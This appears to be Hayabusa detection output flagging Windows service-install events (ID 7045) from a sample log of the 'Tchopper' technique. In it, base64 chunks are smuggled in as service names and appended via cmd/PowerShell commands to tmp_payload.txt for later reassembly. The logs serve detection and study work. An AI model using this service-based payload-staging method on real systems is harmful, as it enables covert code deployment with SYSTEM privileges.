+2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
